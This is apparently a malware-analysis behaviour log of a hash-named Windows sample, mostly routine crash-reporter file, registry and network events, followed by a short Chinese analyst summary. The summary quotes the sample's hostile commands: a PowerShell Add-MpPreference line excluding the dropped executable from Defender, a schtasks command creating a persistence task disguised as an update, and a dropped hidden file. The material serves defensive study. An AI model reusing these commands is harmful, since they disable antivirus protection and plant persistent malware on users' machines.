[操作成功完成。 ], 09:33:19:350, WerFault.exe, 8148:8152, 2928, FILE_write, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp, offset:0x00000000 datalen:0x00000020 , 0x00000000 [操作成功完成。 ], 09:33:19:382, WerFault.exe, 8148:0, 2928, FILE_modified, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp, , 0x00000000 [操作成功完成。 ], 09:33:19:382, WerFault.exe, 8148:8152, 2928, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp, access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:19:400, WerFault.exe, 8148:8152, 2928, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp, , 0x00000000 [操作成功完成。 ], 09:33:19:400, WerFault.exe, 8148:8152, 2928, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp.WERInternalMetadata.xml, access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000001 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:19:400, WerFault.exe, 8148:8152, 2928, FILE_write, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp.WERInternalMetadata.xml, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:33:19:400, WerFault.exe, 8148:0, 2928, EXEC_module_load, C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\comctl32.dll, base:0x00000000742C0000 size:0x0020F000 , 0x00000000 [操作成功完成。 ], 09:33:19:400, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\Windows\SysWOW64\drivers, filter:'*.mrk' , 0x00000000 [操作成功完成。 ], 09:33:19:400, WerFault.exe, 8148:0, 2928, FILE_modified, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp.WERInternalMetadata.xml, , 0x00000000 [操作成功完成。 ], 09:33:19:413, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:19:413, WerFault.exe, 8148:8152, 2928, FILE_readdir, 
C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:19:413, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:19:413, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:19:431, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\Windows\SysWOW64\drivers, filter:'*.mrk' , 0x00000000 [操作成功完成。 ], 09:33:19:431, WerFault.exe, 8148:8152, 2928, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp, access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:19:431, WerFault.exe, 8148:8152, 2928, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp, , 0x00000000 [操作成功完成。 ], 09:33:19:431, WerFault.exe, 8148:8152, 2928, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp.xml, access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:19:444, WerFault.exe, 8148:8152, 2928, FILE_write, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp.xml, offset:0x00000000 datalen:0x00001323 , 0x00000000 [操作成功完成。 ], 09:33:19:444, WerFault.exe, 8148:0, 2928, FILE_modified, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp.xml, , 0x00000000 [操作成功完成。 ], 09:33:19:526, WerFault.exe, 8148:5004, 2928, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:19:526, WerFault.exe, 8148:5004, 2928, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:19:526, WerFault.exe, 8148:5004, 2928, FILE_readdir, 
C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:19:526, WerFault.exe, 8148:5004, 2928, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:19:539, WerFault.exe, 8148:984, 2928, REG_mkkey, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData, access:0x0002001B , 0x00000000 [操作成功完成。 ], 09:33:19:539, WerFault.exe, 8148:984, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\ClockTimeSeconds, type:0x0000000B datalen:8 data:'DF 4A ED 64 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:19:539, WerFault.exe, 8148:984, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\TickCount, type:0x0000000B datalen:8 data:'25 9E 03 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:19:804, powershell.exe, 5080:7324, 2928, FILE_truncate, C:\Users\bonelee\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive, eof:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:19:804, powershell.exe, 5080:7324, 2928, FILE_write, C:\Users\bonelee\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive, offset:0x00000000 datalen:0x00000040 , 0x00000000 [操作成功完成。 ], 09:33:19:804, powershell.exe, 5080:0, 2928, FILE_modified, C:\Users\bonelee\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive, , 0x00000000 [操作成功完成。 ], 09:33:19:804, powershell.exe, 5080:7324, 2928, FILE_truncate, C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log, eof:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:19:804, powershell.exe, 5080:7324, 2928, FILE_write, C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log, offset:0x00000000 datalen:0x00000902 , 0x00000000 [操作成功完成。 ], 09:33:19:804, powershell.exe, 5080:0, 2928, FILE_modified, 
C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log, , 0x00000000 [操作成功完成。 ], 09:33:19:820, conhost.exe, 7172:0, 2928, EXEC_destroy, C:\Windows\System32\conhost.exe, parent_pid:5080 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' , 0x00000000 [操作成功完成。 ], 09:33:19:820, powershell.exe, 5080:0, 2928, EXEC_destroy, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, parent_pid:2928 cmdline:'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe"' , 0x00000000 [操作成功完成。 ], 09:33:20:366, WerFault.exe, 8148:984, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018000B6180B055, type:0x00000003 datalen:346 data:'01 00 00 00 01 00 00 00 D0 8C 9D DF 01 15 D1 11 ' , 0x00000000 [操作成功完成。 ], 09:33:20:366, WerFault.exe, 8148:984, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}\DeviceTicket, type:0x00000003 datalen:2282 data:'01 00 00 00 01 00 00 00 D0 8C 9D DF 01 15 D1 11 ' , 0x00000000 [操作成功完成。 ], 09:33:20:366, WerFault.exe, 8148:984, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}\DeviceId, type:0x00000001 datalen:34 data:'30 30 31 38 30 30 30 42 36 31 38 30 42 30 35 35 ' , 0x00000000 [操作成功完成。 ], 09:33:20:366, WerFault.exe, 8148:984, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}\ApplicationFlags, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:20:382, WerFault.exe, 8148:5004, 2928, FILE_readdir, C:\Windows\SysWOW64\drivers, filter:'*.mrk' , 0x00000000 [操作成功完成。 ], 
09:33:20:475, WerFault.exe, 8148:8004, 2928, NET_connect, 52.168.117.173:443, protocol:(TCP)0 , 0x00000000 [操作成功完成。 ], 09:33:20:711, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:195 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:20:945, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:4380 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:20:945, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:104 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:20:945, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:158 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:21:179, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:51 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:21:179, WerFault.exe, 8148:8004, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList, type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' , 0x00000000 [操作成功完成。 ], 09:33:21:179, WerFault.exe, 8148:8004, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList, type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' , 0x00000000 [操作成功完成。 ], 09:33:21:179, WerFault.exe, 8148:8004, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList, type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' , 0x00000000 [操作成功完成。 ], 09:33:21:179, WerFault.exe, 8148:8004, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local 
Settings\MuiCache\9\AAF68885\LanguageList, type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' , 0x00000000 [操作成功完成。 ], 09:33:21:194, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:1112 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:21:194, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:4125 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:21:194, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:836 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:21:819, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:956 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:21:819, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive, filter:'*_*_*_*_*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_484cb55c9a21365077a1c68a7b9e5e3cb2ef7722_e228f3e3_215782e1, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_6aff93876c44371897d1e8f3858937fb52c494b2_e228f3e3_250f7b02, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_776da5ffe2586954ea640af31356f08d6f957_e228f3e3_086773fd, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_95f6d93027ad781764f63e817714e23f481bb_e228f3e3_06378ac1, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, 
FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_c260964a7f98f65ed93360ecba442716ad992e76_e228f3e3_27d79233, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_d09b36efc1ab823262e4447d9e591ac48e5997_e228f3e3_11bb643e, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_f84eeb62496d5a853d8f5eb857cf87ded2dac7c2_e228f3e3_253b6bfe, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.SkypeA_145397beb22a18b8f2e1ca19a6432416ebb65d7_a1837349_189e5fec, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_877cc3bf84bfd74bbcaeb9ff7ebafc9d7431acc6_d0dcfc74_182671de, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_e77e25b240783efe1581bc847cca6cdb2bdbcfc_e5c57aa7_18266c31, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.YourPh_8877c8bde7fa9a9c5de09dc7b9181a7eabfe680_3a1a0f1d_0c365e66, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_OneDrive.exe_79a15a9e6a5728ac489be495d0f32616b2ecd7_be72a7c1_09779752, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ppPay.exe_6855cd3ec81df2b918bbf4c88c2d3bd08fcf8013_9b390eac_193e9ef5, filter:'*' 
, 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ppPay.exe_6855cd3ec81df2b918bbf4c88c2d3bd08fcf8013_9b390eac_1f11520f, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ppPay.exe_6855cd3ec81df2b918bbf4c88c2d3bd08fcf8013_9b390eac_205ea9bf, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Procmon64.exe_c09532f9985b38eb8e45674be1656687cd9197_ed45741f_1b84066a, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\Critical_10.0.19041.3025__478811c0481f9875deb83cbacc375e7afbeb849_00000000_0a03c628, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\Critical_10.0.19041.3266_e0c719d0ed7ee1aea59de04a38aa654a7c8435_00000000_12cc76cc, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\Critical_10.0.19041.3266__7c8945cffcc7f3887b6b9b7e1e5517ab5968fd6f_00000000_04d90897, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\Critical_10.0.19041.3266__7c8945cffcc7f3887b6b9b7e1e5517ab5968fd6f_00000000_0e873073, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_6_1cecfbec1fce2338d92f0fbce2327564f692bca_00000000_17b3b1ba, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, 
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_6_79fea5be87178577dda92ecb6203330c7841a6a_00000000_121cb425, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_6_c4a938beb533dfcfe565ac4db8c3e59c073d44a_00000000_0278268c, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_MicrosoftEdgeUpd_4df8dce2697bd23aa5ebc0def77646d714659a7c_00000000_18254686, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_MicrosoftEdgeUpd_7b16be7bdf552bdc43e24804272db49eab32bbd_00000000_1f4a525c, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_0976b8b2, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_09779212, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_09779bf5, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_0ccecc6a, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_0ebde483, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, 
WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_224e23fe, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_635d72ba1e42ee980484185cb023e6401bfae3_00000000_0b4486c8, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_635d72ba1e42ee980484185cb023e6401bfae3_00000000_0f6784fe, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_e85b952bb8dc9585c0b96537f30aec9168cfba_00000000_0f6780b8, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_X_c07298f5c3918c4755303fd2741546b048d9a67c_00000000_13937c31, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f, access:0x00100001 alloc_size:0 attrib:0x00000080 share_access:0x00000003 disposition:0x00000002 options:0x00200021 , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f\Report.wer, access:0x00120196 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000005 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_chmod, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f\Report.wer, attrib:0x00002080 
, 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_write, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f\Report.wer, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:0, 2928, FILE_modified, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f\Report.wer, , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp, , 0x00000000 [操作成功完成。 ], 09:33:21:850, WerFault.exe, 8148:8152, 2928, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp.WERInternalMetadata.xml, , 0x00000000 [操作成功完成。 ], 09:33:21:850, WerFault.exe, 8148:8152, 2928, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp.xml, , 0x00000000 [操作成功完成。 ], 09:33:21:850, WerFault.exe, 8148:8152, 2928, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DB8.tmp.csv, , 0x00000000 [操作成功完成。 ], 09:33:21:850, WerFault.exe, 8148:8152, 2928, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DC9.tmp.txt, , 0x00000000 [操作成功完成。 ], 09:33:21:850, WerFault.exe, 8148:0, 2928, EXEC_destroy, C:\Windows\SysWOW64\WerFault.exe, parent_pid:8816 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 8816 -s 1508' , 0x00000000 [操作成功完成。 ], 09:33:21:867, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, EXEC_destroy, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ],
几个关键点:
1、执行 powershell(通过 Add-MpPreference 把释放出的文件路径加入 Defender 排除项):
powershell.exe, 5080:0, 2928, EXEC_create, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, parent_pid:2928 cmdline:'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe"' image_base:0x0000000001150000 image_size:0x0006C000 , 0x00000000 [操作成功完成。 ],
2、BA_extract_hidden:释放隐藏文件(行为监控记录到的释放文件路径名) BA_extract_hidden, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, , 0x00000000 [操作成功完成。 ]
| Time & API | Arguments | Status | Return |
|---|---|---|---|
| 2023/05/28 21:16:58 SetFileAttributesW | file_attributes:8199<br>filepath:C:\Users\Admin\AppData\Roaming\bWyPLjwQzmw.exe<br>filepath_r:C:\Users\Admin\AppData\Roaming\bWyPLjwQzmw.exe | 1 | 1 |
3、创建计划任务(通过 schtasks 从临时目录的 XML 创建名为 Updates\bWyPLjwQzmw 的任务,实现持久化): EXEC_create, C:\Windows\SysWOW64\schtasks.exe, parent_pid:2928 cmdline:'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bWyPLjwQzmw" /XML "C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp"' image_base:0x0000000000EE0000 image_size:0x00033000 , 0x00000000 [操作成功完成。 ],
4、联网:09:33:18:522, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, NET_http, checkip.dyndns.org/, protocol:(TCP)0 cmd:'GET' , 0x00000000 [操作成功完成。 ],
09:33:18:522, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, NET_send, 193.122.130.0:80, protocol:(TCP)0 datalen:151 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
09:33:20:475, WerFault.exe, 8148:8004, 2928, NET_connect, 52.168.117.173:443, protocol:(TCP)0 , 0x00000000 [操作成功完成。 ],
09:33:20:711, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:195 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
09:33:20:945, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:4380 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
09:33:20:945, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:104 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
09:33:20:945, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:158 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
